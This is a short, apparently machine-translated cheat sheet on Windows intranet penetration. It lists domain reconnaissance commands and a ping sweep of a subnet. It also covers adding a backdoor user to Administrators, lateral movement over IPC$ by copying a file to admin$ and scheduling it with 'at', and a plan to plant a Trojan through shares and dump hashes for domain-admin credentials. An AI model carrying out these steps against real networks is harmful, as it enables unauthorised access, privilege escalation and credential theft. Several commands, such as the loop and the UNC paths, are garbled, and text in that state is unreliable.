Information collection
Set ----- Query the system environment variable whoami ----- Query the current user account ipconfig /all ----- Query the IP address of the local host. Net user ----- Local user list. Net user test test /add ----- Add a user. Net localGroup Administrators test /add ----- Upgrade an account to an administrator. Net localgroup administrators ----- View details about a user group. Systeminfo ----- View system information winver ----- Check Windows details TaskList/SVC ----- View the processes netstat -ano ----- View the network connection ports Net use \ IP \ipc$pawword /user:username ----- Set up an IPC sessionCopy the codeNet user /domain ------ Query domain users. Net view /domain ------ Query the domain list. Net view /domain:domainname ------ Query the computers in the workgroup domain Group "domain Admins "/domain ----- View domain administrator net user administrator (domain user) /domain ----- Obtain details about a domain user. Net View ------ Query the list of machines in the same domain arp -a ----- Query the ARP address data stored locallyCopy the codeCopy the codeNet view \\ IP ------ query net group /domain ------ query net group "domain Controllers" /domain ----- Query domain controller NET Localgroup Administrators /domain ------ Log in to the local domain administrator. Net LocalGroup Administrators workGroup \user001 /add ------ Add a domain user to the local PC Net time /domain ------ Determine the primary domain. The primary domain server is the time server. Net Config workstation ------ Current login domainCopy the codeCopy the codeTip:
1. Tasklist/SVC check the service, find the PID, and run netstat -ano to find the port corresponding to the PID
Svchost. exe 1128 TermService C:\>netstat -ano Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 688 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 424 TCP 0.0.0.0:3399 0.0.0.0:0 LISTENING 1128 // Confirm that 3399 is the remote portCopy the code2. Search for surviving hosts in segment C of the Intranet
,1,255 for/l % I in (1) the do @ ping 10.9.10. % 1 - I - w n 1 | find/I "TTL" / / reply from 10.9.10.1: byte 32 time = = 4 ms TTL = 61Copy the code3. Domain servers
Generally, the domain server and DNS server are on the same machine.
The nbtstat command nbtstat -a test.com
Ping The ping test.com command
4. IPC$connection
Net use \ \ 10.9.10.201 \ ipc $abc123! /user:administrator net use \\10.9.10.201\ IPC $abc123! /user:test.com\administrator net use * /del /yes copy 111. TXT \\10.9.10.201\admin$net time \\10.9.10.201 at \ \ 10.9.10.201 1:40 111. TXTCopy the code5. Intranet penetration process
A. Obtain the permission of A server to collect Intranet information through this server. For example, if there are several domains, domain administrator accounts, and intra-domain sharing.
B. If there is a share, you can write to the Trojan horse through the share, upload the HASH capture tool, capture the local HASH, and obtain the domain administrator account
Grasp the hash tools
Reference article:
zhuanlan.zhihu.com/p/22710907
www.360doc.com/content/16/…
Mp.weixin.qq.com/s?__biz=MzI…